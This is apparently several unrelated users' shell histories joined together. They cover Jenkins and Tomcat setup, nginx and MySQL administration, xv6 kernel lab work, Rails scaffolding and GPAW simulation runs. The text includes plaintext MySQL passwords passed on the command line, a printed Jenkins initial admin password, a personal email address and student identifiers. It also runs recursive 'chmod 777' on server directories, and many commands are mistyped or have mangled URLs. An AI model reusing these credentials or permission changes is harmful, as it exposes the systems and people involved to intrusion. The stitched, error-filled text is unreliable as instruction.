/usr/lib/jenkins/jenkins.war /var/lib/tomcat/webapps + +ll +sudo cd /var/lib/tomcat/ +ll +ll +ll +ll +whereis tomcat +c + cd /usr/sharee/tomcat + cd /usr/sharee/tomcat/ + cd /usr/share/tomcat/ +ll +l +ll +ll +ll +ll +ll +ll +ll +ll +ll +chmod +x *.sh +sudo chmod +x *.sh +./startup.sh +ll +whereis tomcat-bin +whereis tomcat +ll +ll +pwd +clear +ll +ll +whereis tomcat +ll +ll +ll +- +sudo service tomcat start +ll +ll +sudo service tomcat start +ll +ll +l +ll +sudo service jenkins start +sudo chmod -R 777 /usr/share/tomcat/.jenkins/ +ll +ll +sudo chmod -R 777 webapps +sudo service jenkins start +ll +unzip jenkins.war +sudo unzip jenkins.war +sudo extract jenkins.war +sudo jenkins.war +jenkins.war +ll +ll +ll +clear +sudo yum -y update +sudo yum -y install java-1.8.0 java-1.8.0-devel + sudo wget -O /etc/yum.repos.d/jenkins.repos.io/redhat-stable/jenkins.repo +sudo rpm --imports.io/redhat-stable/jenkins.io.key + +sudo rpm --imports.io/redhat-stable/jenkins.io.key + sudo yum -y install jenkins + sudo systemctl start jenkins + netstat -ntpl | grep 8080 +cat /var/lib/jenkins/secrets/initialAdminPassword +sudo cat /var/lib/jenkins/secrets/initialAdminPassword +5f201a4c9bea4c80a1d98fa9d7042248 +git configure +exit +df -Th +ls -l / +df -Th +apt-get update && apt-get upgrade -y +sudo apt-get update +sudo apt-get upgrade +ls -l /etc/hosts +sudo emacs /etc/hosts +sudo apt-get install emacs -y +echo "export EDITOR=emacs" >> "$HOME/.profile" +sudo emacs /etc/hosts +sudo ls +sudo su root +su nginx +sudo su root +su nginx +exit +su nginx +sudo passwd nginx +su nginx +ls /var/log/ +tail /var/log/php5-fpm.log +sudo tail /var/log/php5-fpm.log +sudo tail /var/log/nginx/error.log +pwd +sudo su nginx +exit +sudo tail /var/log/nginx/error.log -f +sudo su nginx +ls +sudo mv community.20140814_224807.tar.gz /home/nginx/ +ls -la /home/nginx/community.20140814_224807.tar.gz +chwon nginx /home/nginx/community.20140814_224807.tar.gz +chown nginx /home/nginx/community.20140814_224807.tar.gz +sudo chown nginx /home/nginx/community.20140814_224807.tar.gz +ls -la /home/nginx/community.20140814_224807.tar.gz +chown nginx:nginx /home/nginx/community.20140814_224807.tar.gz +sudo chown nginx:nginx /home/nginx/community.20140814_224807.tar.gz +ls -la /home/nginx/community.20140814_224807.tar.gz +sudo su nginx +exit +lsblk +exit +ls +ls / +mysql +ls /home/ +ls /home/nginx/ +mysql -u root -p +sudo adduser aschaeffer --disabled-password +ls /home +ls +mkdir .ssh +sudo mkdir .ssh +ls +sudo mkdir .ssh +ls +ls -A +sudo su - aschaeffer +ls -A +ls .ssh +mysql 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+groups aschaeffer +sudo usermod -a -G sudo aschaeffer +groups aschaeffer +cat /etc/group | grep admin +groups +sudo usermod -a -G admin aschaeffer +groups aschaeffer +ls -A +mysql -u community_admin -p +ls -A +vim .bashrc +source .bashrc +ls +ls -A +vim .bashrc +ll +la +alias +l +man ls +vim .bashrc +cp .bashrc .bashrc.bak +vim .bashrc +source .bashrc +vim .bashrc +cp .bashrc.bak .bashrc +source .bashrc +vim .bashrc +source .bashrc +vim .bashrc +source .bashrc +vim .bashrc +source .bashrc +vim .bashrc +source .bashrc +vim .bashrc +source .bashrc +ls +la +sl +la +sudo apt-get upgrade -s +la +ls +la +la +git status +git log +ls /var/ +ls/ +ls / +ls +la +ls bin +ls mysql_backups/ +ls etc/ +ls +la bin +la opt +la usr +la usr/local/ +la +ls +ls +git status +sudo su - nginx +exit +ls +ls -A +vim .bashrc +la +vim .bashrc +mysql -u root -p +mysql -u root -pPA:iRM8mh9%j +mysql -u stars_jobs -pPA:iRM8mh9%j +mysql -u stars_joms -pPA:iRM8mh9%j +mysql -u root -p hcilab300 +mysql -u root -p +mysql -u root -phcilab300 +mysql -u community_admin -p +mysqldump -u community_admin -p community > community-bak-2014-11-18.sql +ll +ll -h +mysqldump -u community_admin -p --databases community > community-bak-2014-11-18.sql +mysql -u root -p +mysql -u community_admin -p +mysql -u community_admin -pGJD^G63MwKtG) +mysql -u community_admin -p'GJD^G63MwKtG)' +SELECT * FROM `users` +INNER JOIN `field_revision_field_gender__` ON users.uid=field_revision_field_gender__.entity_id +INNER JOIN `field_revision_field_graduation_year__` ON users.uid=field_revision_field_graduation_year__.entity_id +INNER JOIN `field_revision_field_school__` ON users.uid=field_revision_field_school__.entity_id +INNER JOIN `field_data_field_ethnicity__` ON users.uid=field_data_field_ethnicity__.entity_id +INNER JOIN `field_data_field_overall_gpa__` ON users.uid=field_data_field_overall_gpa__.entity_id +mysql -u community_admin -p'GJD^G63MwKtG)' +mysql -u community_admin -p'GJD^G63MwKtG)' community +ls +sudo su - nginx +sudo +sudo su +ls +mysql -u root -p +mysql -u community -p +mysql -u community_admin -p +ls +date +date +'%Y-%m-%d' +vim db_backup.sh +chmod +x db_backup.sh +./db_backup.sh +ls +vim db_backup.sh +mysql -u community_admin -pGJD^G63MwKtG) +mysql -u community_admin -p'GJD^G63MwKtG)' +ls +ls / +ls +rm STARS-bak-2015-01-26.sql +sudo su -nginx +sudo su - nginx +ls +sudo su +ls +dir +su nginx +sudo su +ls +cat db_backup.sh +./db_backup.sh +ls +rm STARS-bak-2015-03-09.sql +ls +./db_backup.sh +ls +ls +ls +ls +sudo su -nginx +sudo su - nginx +exit +ls +ls +ls +ls +exit +ls +ls -i +ls -l +ls -l +chmod 0644 os.html +ls -l +mysql -h alas -u ml12087 -p +whereis mysql +mysql -u root -p +mysql -u root -p +mysqli -u root -p dragonnetwork +mysql -u root -p dragonnetwork +mysql -u root -pdragonnetwork +mysql -u root -proot +mysql -h alas -u ml12087 -p +mysql -h alas -u ml12087 -p +lscpu +free -g +c +ls -l +ls -l +mysql -h alas -u ml12087 -p +mysql -h alas -u ml12087 -p +mysql -h alas -u ml12087 -p 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+ls -a +vim .bashrc +clear +ls +vim .vimrc +clear +ls +ls -a +clear +ls +rm header.txt +clear +ls +more tree.txt +rm tree.txt +clear +ls +more test_script.sh +clear +ls +clear +ls +mkdir Test +ls +mv *.sh ./Test/ +mv bash.md ./Test/ +mv haskell.md ./Test/ +ls +clear +ls +ls -a +clear +ls +ls -a +vim .screenrc +clear +ls +ls -a +vim .bash_pro +vim .bash_paths +vim .screenrc +clear +ls +exit +vim /Library/Preferences/SystemConfiguration/com.apple.smb.server +ls ~/Library/Application Support/Dock/ +ls ~/Library/Application\ Support/Dock/ +ls ~/Library/Application\ Support/Dock/desktoppicture.db +ls /System/Library/CoreServices/ +open /System/Library/CoreServices/DefaultDesktop.jpg +ls /System/Library/CoreServices/*.jpg +ls /Library/Desktop\ Pictures/` + +ls Library/Desktop\ Pictures +ls Library/ +clear +ls +exit +ls /Library/Desktop Pictures/ +ls /Library/ +exit +git clones/xv6-public.git +ls +make qemu +ls +make clean && make qemu +ls +ls +gdb +make clean && make qemu-nox +make qemu-nox-gdb +ls +echo "add-auto-load-safe-path /home/csmajs/8621288940/xv6-public/.gdbinit" >> .gdbinit +ls +cfce4-terminal& +xfce4-terminal & +ls +make qemu-nox-gdb +ls +make qemu-nox-gdb +make clean && make qemu-nox-gdb +ls +echo "add-auto-load-safe-path /home/csmajs/861288940/xv6-public/.gdbinit">>.gdbinit +make qemu-gdb +make qemu-gdb-nox +make qemu-nox-gdb +echo "add-auto-load-safe-path /home/csmajs/ayip001/xv6-public/.gdbinit">>.gdbinit +make qemu-nox-gdb +gdb +ls +gdb +gdb +ls +ls +vim proc.c +gdb +ls +make clean && make qemu-nox-gdb +ls +vim proc.c +make clean && make qemu-nox-gdb +vim proc.c +make clean && make qemu-nox-gdb +kill $(pgrep qemu) +ls +gdb +make clean && make qemu-nox-gdb +ls +vim proc.c +ls +make clean && make qemu +ls +ls +rm -r xv6-public +ls +git clones/xv6-public.git +ls +echo "add-auto-load-safe-path /home/csmajs/ayip001/xv6-public/.gdbinit" >> .gdbinit +ls +ls +make clean && make qemu +ls +ls +make clean && make qemu +make clean && make qemu-nox-gdb +kill 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+sed -i 's/exit()/exit(0)/g' forktest.asm +sed -i 's/exit()/exit(0)/g' cat.c +sed -i 's/exit()/exit(0)/g' sysproc.c +sed -i 's/exit()/exit(0)/g' wc.asm +sed -i 's/exit()/exit(0)/g' usrtests.asm +sed -i 's/exit()/exit(0)/g' usertests.asm +sed -i 's/exit()/exit(0)/g' grep.asm +sed -i 's/exit()/exit(0)/g' echo.asm +sed -i 's/exit()/exit(0)/g' ln.asm +sed -i 's/exit()/exit(0)/g' rm.c +sed -i 's/exit()/exit(0)/g' stressfs.asm +sed -i 's/exit()/exit(0)/g' sh.c +sed -i 's/exit()/exit(0)/g' zombie.c +sed -i 's/exit()/exit(0)/g' kernel.asm +sed -i 's/exit()/exit(0)/g' mkdir.asm +sed -i 's/exit()/exit(0)/g' mkdir.c +sed -i 's/exit()/exit(0)/g' ls.c +sed -i 's/exit()/exit(0)/g' kill.c +sed -i 's/exit()/exit(0)/g' init.c +sed -i 's/exit()/exit(0)/g' ls.asm +sed -i 's/exit()/exit(0)/g' usertest.c +sed -i 's/exit()/exit(0)/g' usertests.c +sed -i 's/exit()/exit(0)/g' wc.c +sed -i 's/exit()/exit(0)/g' sh.asm +grep -r "exit()" +grep -r "exit" +grep -r "exit()" +grep -r "wait()" +vim proc.c +vim proc.h +vim users.h +vim user.h +vim defs.h +vim sysproc.c +vim proc.h +vim proc.c +vim syscall.c +vim sysproc.c +vim syscall.c +vim proc.c +ls +make clean && qemu-nox-gdb +make clean && make qemu-nox-gdb +vim cat.c +vim proc.c +vim proc.h +make clean && make qemu-nox-gdb +vim user.h +make clean && make qemu-nox-gdb +vim user.h +make clean && make qemu-nox-gdb +vim x86.h +make clean && make qemu-nox-gdb +vim proc.h +make clean && make qemu-nox-gdb +vim proc.c +vim proc.h +make clean && make qemu-nox-gdb +vim proc.h +make clean && make qemu-nox-gdb +vim x86.h +make clean && make qemu-nox-gdb +vim proc.h +vim x86.h +make clean && make qemu-nox-gdb +grep "exit +grep exit +grep -i 'exit' +vim proc.c +make clean && make qemu-nox-gdb +ls +gdb +make clean && make qemu-nox-gdb +vim x86.h +make clean && make qemu-nox-gdb +vim x86.h +vim Makefile +vim console.c +make clean qemu-nox +vim console.c +make clean && make qemu-nox +vim x86.h +ls +rm xv6-public +rm -r xv6-public +ls +rm -r xv6-public +ls +rm -r xv6-public +ls +git clones/xv6-public.git +ls +echo "add-auto-load-safe-path /home/csmajs/ayip001/xv6-public/.gdbinit" >> .gdbinit +make clean && make qemu-nox +make qemu-nox +ld +ls +make clean && make qemu-nox +ls +vim proc.h +vim proc.c +grep exit +vim user.h +vim syscall.c +vim syscall.h +vim sysproc.c +vim usys.s +ls +vim usys.S +vim defs.h +vim proc.c +vim sysproc.c +vim proc.c +vim usys.S +vim defs.h +vim usys.S +vim sysproc.c +ls +ls +geany *.c *.h *S Makefile & +geany lab1.c +grep -r "exit()" +geany *.c *.h *S Makefile & +make clean && make qemu-nox +geany cat.c +grep -r "exit()" +ls +grep -r "exit()" +sed -i 's/exit()/exit(0)/g' usertests.c +grep -r "exit()" +geany initcode.S +grep -r "exit()" +grep -r "wait()" +sed -i 's/wait()/wait(0)/g' usertests.c init.c sh.c forktest.c +grep -r "wait()" +sed -i 's/wait()/wait(0)/g' stressfs.c lab1.c proc.c +geany usertests.c +make clean && make qemu-nox +geany lab1.c +make clean && make qemu-nox +geany lab1.c +make clean && make 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+;s +ls +geany proc.c +l +ls +geany proc.c +geany +apt-get update -y +apt-get install git -y +git init +ls -a +git config --global user.name "suresh" +git config --global user.email "gsuresh432@gmail.com" +touch a b bc +git status +git add . +git status +git commit -m "first" +git log +~clear +git clonesureshbabugu/test123.git +ls +git push +ls +git push a +git status +git remote add origin +git pull origin master +ls +c +ls +pcdus +h +git push origin master +top +mkdir projects +rails generate scaffold idea name:string description:text picture:string +ruby bin/rake db:migrate +rails server +rails s -p $PORT -b $IP +top +sudo apt-get updat +sudo apt-get update +sudo apt-get upgrade +sudo apt-get update +sudo apt-get upgrade +sudo reboot +sudo apt-get update +sudo apt-get upgrade +sudo apt-get linux-headers-server +sudo apt-get install linux-headers-server +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install linux-server +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install python-software-properties +sudo add-apt-repository ppa:campos-dev/ppa +sudo add-apt-repository ppa:campos-dev/campos +sudo apt-get update +sudo apt-get install gpaw +sudo apt-get update +sudo apt-get install python-ase +sudo apt-get install gpaw-setups +sudo apt-get install ssh +sudo apt-get install openmpi + +reboot +sudo reboot +scp -r renat@fii.fi.tartu.ee:amAu111BF4 ~/amAu111BF4 +ls -l +ls -l +sudo rm renat@fii.fi.tartu.ee +sudo rm -r renat@fii.fi.tartu.ee +ls -l +exit +ls +ls +less 22.py +sudo ls +ls +less 8Si.py +ls ~ +ls /home/dirac/amAu111BF4/22.py +less /home/dirac/amAu111BF4/22.py +less 8Si.py +less 2Al.py +ls +ls +ls +less 22.py +less 64.py +mpirun -np 1 gpaw-python 22.py > log.txt & +tail -f log.txt +top +tail -f log.txt +less log.txt +top +mpirun -np 1 gpaw-python 22.py +mpirun -np 8 gpaw-python 22.py +top +ping www.yahoo.com +sudo ifconfig up +sudo ifconfig etho up +sudo ifconfig eth0 up +ifconfig +ping www.yahoo.com +sudo ifconfig eth0 up +sudo ifconfig up +sudo /etc/init.d/networking restart +ping www.yahoo.com +sudo /etc/init.d/networking restart +sudo /etc/init.d/networking star +sudo service networking start +ping www.yahoo.com +sudo service networking stop +history +history | less +ping www.yahoo.com +ifconfig +ls /etc/network/interfaces +less /etc/network/interfaces +sudo ifup etho0 +sudo ifup eth0 +sudo restart now +sudo restart +sudo restart -h +sudo restart --help +sudo shutdown now +ping www.yahoo.com +sudo ifup eth0 +ping www.yahoo.com +sudo ifup eth0 +sudo ifup eth3 +sudo ifup eth0 +modprobe e1000 +sudo ifup eth0 +whereis dhcpcd +dmesg | less +man dmesg +ifconfig -a +sudo ifup eth1 +ping www.yahoo.com +sudo ifup eth1 +sudo ifup eth0 +sudo ifup eth1 +sudo ifconfig up eth1 +sudo ifconfig --help +sudo ifconfig --help | less +sudo ifconfig --help 2>&1 | less +sudo ifconfig eth1 up +ping www.yahoo.com +sudo ifconfig eth2 up +sudo ifconfig eth0 up +sudo ifconfig eth3 up +ping www.yahoo.com +sudo service networking restart +sudo service networking stop +ping www.yahoo.com +sudo /etc/init.d/networking +sudo /etc/init.d/networking restart +sudo ifconfig +ls /etc/network/interfaces +less /etc/network/interfaces +ifconfig eth0 up +ifconfig eth1 up +sudo ifconfig eth0 up +whereis eth1 +clear +sudo ifconfig up +lshw +lshw | grep eth +sudo nano /etc/network/interfaces +sudo /etc/init.d/network restart +sudo /etc/init.d/networking restart +sudo nano /etc/network/interfaces +sudo /etc/init.d/networking restart +ping www.yahoo.com +man /etc/network/interfaces +apt-get install lynx +sudo apt-get install lynx +wgets/collectd-5.0.0.tar.gz +ls +tar -xzf collectd-5.0.0.tar.gz +ls +less README +./configure +make all +sudo make install +ls +less etc/collectd.conf +sudo less etc/collectd.conf +sudo apt-get install librrd2-dev +less /opt/collectd/etc/collectd.conf +sudo less /opt/collectd/etc/collectd.conf +ls +ls +sudo make remove +sudo make uninstall +sudo rm -rf /opt/collectd/ +./configure | tee out.text +less out.text +sudo apt-get install librrd2-dev +./configure | tee out.text +less out.text +make clean +make +make all +sudo make install +less /opt/collectd/etc/collectd.conf +sudo less /opt/collectd/etc/collectd.conf +sudo less /etc/init.d/networking +ls +ls +ls etc/ +sudo find . -name collectd +less sbin/collectd +less include/collectd/ +less /etc/rc.local +ls -al /etc/rc.local +sudo /opt/collectd/sbin/collect +top +less etc/collectd.conf +sudo less etc/collectd.conf +whereis rrdtool +history | grep rrd +apt-get install rrdtool +sudo apt-get install rrdtool +rrdtool +rrdtool graph +rrdtool graph | less +rrdtool graph var/lib/collectd/dirac.lan/cpu-0 +ls +rrdtool grep tessh localhost +ls +ls +mpirun -np 4 gpaw-python 22.py +top +ls -la /opt/collectd/var/lib/collectd/dirac.lan/cpu-0/cpu-idle.rrd +date +ps auwx | grep collectd +ls +less rc.local +ls +grep collectd * + +grep collectd * -Ir +ls ../rc.local +less ../rc.local +ls +ls +mpirun -np 2 gpaw-python 22.py +ls -la 22.txt +date +less 22.txt +top +gpaw-python 22.py +gpaw-python -np 22.py > out.txt +mpirun -np gpaw-python 22.py > out.txt +ls +mpirun -np 2 gpaw-python 22.py > out.txt +less 22.py +mpirun -np 2 gpaw-python 22.py > out.txt +ifconfig +nslookup localhost +ping www.yahoo.com +sudo service networking restart +ping www.yahoo.com +sudo service networking stop +sudo service networking start +ping www.yahoo.com +sudo /etc/init.d/networking restart +ping www.yahoo.com +ifconfig +ls +unzip Attachments_2011_04_19.zip +sudo apt-get install unzip +unzip Attachments_2011_04_19.zip +top +ls +mpirun -np 2 Bi-4-8nodes.py +mpirun -np 2 gpaw-python Bi-4-8nodes.py +top +mpirun -np 2 gpaw-python Bi-4-8nodes.py +less Bi-4-8nodes.py +mpirun -np 2 gpaw-python Bi-4-8nodes.py +mpirun -np 8 gpaw-python Bi-4-8nodes.py +ls +less Bi111dl-1.65.txt +mpirun -np 2 gpaw-python da-k-4nodes.py +mpirun -np 2 gpaw-python da-k-4nodes.py | tee out.txt 2>&1 +less out.txt +mpirun -np 2 gpaw-python da-k-4nodes.py 2>&1 | tee out.txt +less out.txt +ls da-k-4nodes.py +less da-k-4nodes.py +less da-k-2nodes.py +less dl-k-2nodes.py +mpirun -np 2 gpaw-python dl-k-2nodes.py +top +mpirun -np 2 gpaw-python da-h-8nodes.py +mpirun -np 2 gpaw-python Bi-4-8nodes.py +mpirun -np 2 gpaw-python da-h-8nodes.py +mpirun -np 2 gpaw-python dl-k-2nodes.py +top +ls +ls -la +date +ls +rm collectd-5.0.0.tar.gz +rm -rf collectd-5.0.0/ +ls +ps auwx | grep collectd +grep * -Ir collectd +grep -Ir collectd * +grep -Ir collectd * +ls +ls -la +sudo nano collectd +ifconfig +sudo cp /home/dirac/collectd . +chmod a+xr collectd +sudo chmod a+xr collectd +sudo chown root collectd +ls -la +ls -la | collectd +ls -la | grep collectd +ps auwx | grep collectd +sudo service collectd start +whereis collectd +sudo nano collectd +sudo service collectd start +ps auwx | grep collectd +sudo /etc/init.d/collectd start +ps auwx | grep collectd +sudo nano collectd +sudo /etc/init.d/collectd start +sudo nano collectd +sudo /etc/init.d/collectd start +ps auwx | grep collectd +sudo /etc/init.d/collectd stop +ps auwx | grep collectd +sudo nano collectd +man update-rc.d +sudo update-rc.d collectd defaults +sudo shutdown now +ls +ls +ls +man pidof +ls +less ssh +grep stat_busy * +less bootlogd +grep stat_fail * +ls +nano bootlogd +less cron +ls +sudo apt-get update +sudo apt-get install -y build-essential gdb git gcc-multilib +git clone +sudo apt-get install -y libsdl1.2-dev libtool-bin libglib2.0-dev libz-dev libpixman-1-dev +./configure --disable-kvm --target-list="i386-softmmu x86_64-softmmu" +make +sudo make install +git clones/xv6-public.git xv6 +make +echo "add-auto-load-safe-path $HOME/xv6/.gdbinit" > ~/.gdbinit +ls +.. +ls +gdb -q +make qemu-nox-gdb +gdb +ls +ls +gdb +sudo apt-get update +ls +ls +make +echo "add-auto-load-safe-path $HOME/xv6/.gdbinit" > ~/.gdbinit +make qemu-nox-gdb +ls +gdb -q +ls +make qemu-nox-gdb +ls +make qemu-nox-gdb +ls +gdb -q +ls +make qemu-nox-gdb +ls +make qemu-nox-gdb +gdb +ls +make qemu-nox-gdb +pwd +/home/ubuntu/xv6 +make qemu-nox-gdb +ls +make qemu-nox-gdb +gdb +ls +gdb -q +ls +ls +gdb -q +ls +make qemu-nox-gdb +ls +ls +make qemu-gdb +ls +make qemu-gdb +gdb +ls +gdb -g +ls +proc.h +cat proc.h +ls +cat proc.h +ls +cat exit +cat proc.h +vim proc.h +ls +cat user.h +cat defs.h +vim defs.h +viim proc.c +vim proc.c +vim proc.h +vim proc.c +vim proc.h +vim user.h +vim proc.h +vim user.h +vim def.h +vim defs.h +vim sysproc.c +vim proc.c +vim defs.h +vim proc.c +c +vim proc.c +ls +cat proc.c +s +ls +vim proc.c +ls +make qemu-gdb +make qemu-nox-gdb +ls +gdb +ls +gdb -q +ls +gdb -q +ls +xv6 +make qemu-nox-gdb +ls +vim user.h +vim user.s +vim syscall.c +vim sysproc.c +vim user.h +vim sysproc.c +vim proc.c +grep "exit" +grep "exit(" *.c +vim cat.c +vim proc.c +vim cat.c +grep "exit(" *.c +vim zombie.c +grep "exit(" *.c +wc.c +vim wc.c +wc.c +grep "exit(" *.c +vim usertests.c +ls +vim proc.c +vim user.h +vim defs.h +vim sysproc.c +vim proc.c +vim user.h +grep "exit(" *.c +vim usertests.c +vim proc.c +vim sysproc.c +vim proc.c +vim sysproc.c +vim proc.c +vim sysproc.c +grep "exit()"*.c +grep "exit("*.c +grep "exit(" *.c +vim usertests.c +grep "exit(" *.c +vim tap.c +vim sysproc.c +vimusertests.c:// does exit() call iput(p->cwd) in a transaction? +vim suertests.c +vim uertests.c +vim usertests.c +cat usertests.c +vim usertests.c +vim echo.c +vim forktest.c +vim user.h +vim proc.c + +make qemu-nox-gdb +clc +make qemu-nox-gdb +vim sysproc.c +make qemu-nox-gdb +ls +ls +vim proc.c +vim user.h +vim defs.h +vim sysproc.c +vim proc.c +vim proc.h +vim syscall.h +vim syscall.c +vim user.h +vim usys.s +vim usys.S +vim sysproc.c +vim defs.h +grep "exit(" *.c +vim usertests.c +vim cat.c +vim wc.c +vim zombie.c +grep "wait(" *.c +vim forktest..c +vim forktest.c +vim sh.c +vim forktest.c +vim proc.c +grep "wait()" *.c +vim init.c +vim stressfs.c +vim usertest.c +vim usertests.c +grep "wait()" *.c +vim sysproc.c +vim proc.c +grep "exit()" *.c +vim grep.c +vim trap.c +vim sh.c +vim rm.c +vim mkdir.c +vim ls.c +vim kill.c +grep "exit()" *.c +vim ln.c +vim usertests.c +grep "exit()" *.c +vim usertests.c +grep "wait()" *.c +ls +vim user.h +si +qb +vim hello.c +make +vim proc.h +make +vim proc.h +make +vim proc.h +make +vim proc.c +make +vim proc.c +make +make qemu +vim forktest.c +vim proc.c +vim proc.h +ls +vim exec.c +vim cat.c +vim usertests.c +grep "_cat" *.c +vim mkfs.c +grep "_cat" +vim printf.c +vim sysproc.c +vim file.c +vim asm.h +vim bio +vim bio.c +grep fork sh.c | wc -l +ls +vim proc.c +runcmd +/bin/echo +vim exec.c +vim exec.d +vim exec.o +vim exec.c +/bin/echo +/bin/echo hello +vim exec.c +/bin/echo hello +vim exec.c +vim hello.c +pwd +exec("/home/ubuntu/xv6","hello.c") + +exec() hello.c +/bin/bash/hello.c +gcc -o hello hello.c +vim hello.c +gcc -o hello hello.c +vim user.h +gcc -o hello hello.c +vim user.h +/bin/echo hello +/bin/echo +echo hello +fd = dup(1) +fd = dup(1); +ls +open("hello.c") +pwd +open("/home/ubuntu/xv6",hello) +open("/home/ubuntu/xv6",hello.c) +open("/home/ubuntu/xv6","hello") +open("/home/ubuntu/xv6","hello.c") +ls +vim hello.c +gcc -o hello hello.c +vim hello.c +gcc -o hello hello.c +ls +ls +vim forktest.c +vim exec.c +vim main.c +ls +ls +vim Makefile.c +vim Makefile +make qemu-nox +vim forktest.c +make qemu-nox +vim forktest.c +vim init.c +make qemu-nox +vim sh.c +make qemu-nox +vim sh.c +make qemu-nox +vim sh.c +make qemu-nox +vim stressfs.c +make qemu-nox +vim usertests.c +make qemu-nox +vim usertests.c +make qemu-nox +vim usertests.c +make qemu-nox +vim usertests.c +make qemu-nox +vim usertests.c +make qemu-nox +vim usertests.c +make qemu-nox +vim usertests.c +make qemu-nox +vim usertests.c +make qemu-nox +vim usertests.c +make qemu-nox +vim usertests.c +make qemu-nox +vim usertests.c +make qemu-nox +vim usertests.c +make qemu-nox +vim usertests.c +make qemu-nox +vim usertests.c +make qemu-nox +vim usertests.c +make qemu-nox +vim usertests.c +make qemu-nox +vim proc.c +make qemu-nox +vim proc.c + +vim proc.c +make qemu-nox +vim proc.c +make qemu-nox +vim proc.c +make qemu-nox +vim proc.c +make qemu-nox +vim proc.c +make qemu-nox +vim sysproc.c +vim proc.c +vim sysproc.c +make qemu-nox +ls +ls +vim proc.c +vim sysproc.c +vim proc.c +vim sysproc.c +vim proc.c +cat>test.c +ls +make qemu +vim rpoc.c +vim proc.c +make qemu +ls +vim Makefile +make +make clean +ls +make +ls +vim Makefile +vim test.c +vim Makefile +make +make clean +make +ls +vim test.c +vim Makefile +make clean +make +gcc -o test test.c +./test +cat>test.c +make clean +make +vim test.c +cat>test.c +make clean +make +gcc -o test test.c +./test +ls +run test.c +ls +gcc test.c -o test +ls +vim proc.c +run xv6 +make qemu-nox +vim test.c +cat>test.c +make qemu-nox +vim proc.c +vim Makefile +make clean +make +make qemu-nox +ls +vim Makefile +make clean +make +make qemu-nox +vim proc.c +make clean +make +vim proc.c +make clean +make +vim proc.c +make clean +make +vim Makefile +make +make clean +make +make qemu-nox +vim test.c +make qemu-nox +vim proc.c +ls +ls +ls +vim sys.c +vim syscall.c +vim proc.c +vim proc.h +vim sysproc.c +vim defs.h +vim user.h +make clean +make +vim proc.c +vim proc.h +make clean +make +vim proc.c +make clean +make +vim syscall.c +vim syscall.h +make clean +make +vim syscall.c +make clean +make +ls +make nox_qemu +make qemu_nox +make +make qemu_nox +vim test.c +cat>test.c +gcc test.c -o test +vim test.c +make clean +make +make clean +make +vim test.c +cat>test.c +make clean +make +vim proc.c +vim test.c +vim proc.c +ls +vim exec.c +vim echo.c +grep "sche" +grep "exit.(" +grep "exit." c* +grep "sche" *.c +vim main.c +vim proc.c +make clean +make +vim proc.c +make clean +make +vim proc.c +make clean +make +vim proc.c +make clean +make +vim test.c +vim proc.c +make clean +make +vim proc.h +vim user.h +vim defs.h +vim syscall.c +make clean +make +vim proc.c +vim syscall.c +vim sysproc.c +make clean +make +vim syscall.c +vim proc.c +vim syscall.c +vim proc.c +vim syscall.c +vim proc.c +vim syscall.c +vim defs.h +vim user.c +vim user.h +make clean +make +vim syscall.o +vim test.c +vim user.h +make clean +make +ls +make clean +make +vim syscall.c +vim proc.c +vim defs.h +vim user.h +vim sysproc.c +vim proc.c +ls +gre "priority"*.c +grep "priority"*.c +grep "setpriority("*.c +grep "setpriority(" *.c +vim syscall.c +vim sysproc.c +make clean +make +vim syscall.c +make clean +make +vim syscall.c +vim user.h +vim syscall.h +make +make clean +make +vim sysproc.c +make clean +make +vim user.h +make clean +make +vim test.c +make clean +make +vim test.c +gcc test.c -o test +vim user.h +make clean +make +gcc test.c -o test +vim user.h +make clean +make +vim proc.c +make clean +make +vim test.c +vim proc.c +vim proc.h +vim proc.c +make clean +make +vim proc.c +make clean +make +vim proc.c +make clean +make +vim proc.c +make clean +make +vim proc.c +make clean +make +vim proc.c +make clean +make +vim proc.c +make clean +make +vim proc.c +make clean +make +vim proc.c +vim test.c +make clean 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+vim proc.c +make clean +make +vim proc.c +make clean +make +vim proc.c +make clean +make +gcc test.c -o test +vim proc.c +make clean +make +gcc test.c -o test +vim proc.c +make clean +make +gcc test.c -o test +vim proc.c +make clean +make +vim proc.c +make clean +make +vim proc.c +make clean +make +make qemu-nox +vim proc.c +make clean +make +make qemu-nox +vim proc.c +make clean +make qemu-nox +ls +make clean +make +make qemu-nox +ls +whoami +scp lab1_siman003@ucr.edu_rwils006@ucr.edu.zip ubuntu@shimaimani +scp ubuntu@shimaimani.com:/Users/shimaimani/Desktop /home/ubuntu/lab1_siman003@ucr.edu_rwils006@ucr.edu.zip +scp ubuntu@shimaimani:/Users/shimaimani/Desktop /home/ubuntu/lab1_siman003@ucr.edu_rwils006@ucr.edu.zip +scp ubuntu@shimaimani.com:/Users/shimaimani/Desktop /home/ubuntu/lab1_siman003@ucr.edu_rwils006@ucr.edu.zip +scp ubuntu@shimaimani:/Users/shimaimani/Desktop /home/ubuntu/lab1_siman003@ucr.edu_rwils006@ucr.edu.zip +ls +exit +ls +pwd +exit +ls +pwd +exit +ls +ls +make clean +grep "exit.(" *c +grep "exit.(0" *c +grep "exit(0."*c +grep "exit(".*c +grep "exit"*c +grep "exit(".*c +grep "exit(" .*c +grep "exit(" *.c +grep "wait" *.c +vim proc.c +vim Makefile +make clean +make +make qemu-nox +ls +vim proc.c +vim defs.h +vim user.h +vim proc.h +vim sysproc.c +grep "exit(" *.c +vim proc.c +vim user.h +vim defs.h +vim sysproc.c +vim proc.h +vim proc.c +vim defs.h +vim sysproc.c +vim user.h +vim sysproc.h +ls +grep "waitpi" *.c +vim usys.S +vim syscall.c +vim proc.c +vim proc.h +vim defs.h +vim user.h +vim usys.S +vim sysproc.c +vim syscall.c +ls +grep "priority"*.c +grep "priority" *.c +vim syscall.c +make clean +make qemu_nox +make qemu-nox +vim defs.h +vim user.h +ls +make clean +zip -r lab1_siman003@ucr.edu_rwils006@ucr.edu.zip xv6/ +sudo apt install zip +zip -r lab1_siman003@ucr.edu_rwils006@ucr.edu.zip xv6/ +zip -r lab1_siman003@ucr.edu_rwils006@ucr.edu.zip xv6 +zip -r lab1_siman003@ucr.edu_rwils006@ucr.edu.zip +ls +ls +zip -r lab1_siman003@ucr.edu_rwils006@ucr.edu.zip xv6/ +ls +ls +ls +scp siman003@remote_host.com:/some/remote/directory /home/ubuntu/lab1_siman003@ucr.edu_rwils006@ucr.edu.zip +scp ubunu@ubuntu-xenial.com:/Desktop /home/ubuntu/lab1_siman003@ucr.edu_rwils006@ucr.edu.zip +scp ubuntu@ubuntu-xenial.com:/Desktop ~/lab1_siman003@ucr.edu_rwils006@ucr.edu.zip +ls +git init 